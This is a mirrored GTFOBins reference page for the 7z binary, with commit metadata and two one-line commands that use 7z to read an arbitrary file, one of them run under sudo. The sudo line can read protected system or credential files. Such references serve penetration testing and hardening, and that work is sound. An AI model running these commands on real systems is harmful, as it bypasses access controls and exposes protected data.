1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/7z.md
Yuta Yamate 8d82a69fb7
Add 7z
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 12:26:45 +01:00

237 B

functions
file-read sudo
code
LFILE=file_to_read 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
code
LFILE=file_to_read sudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so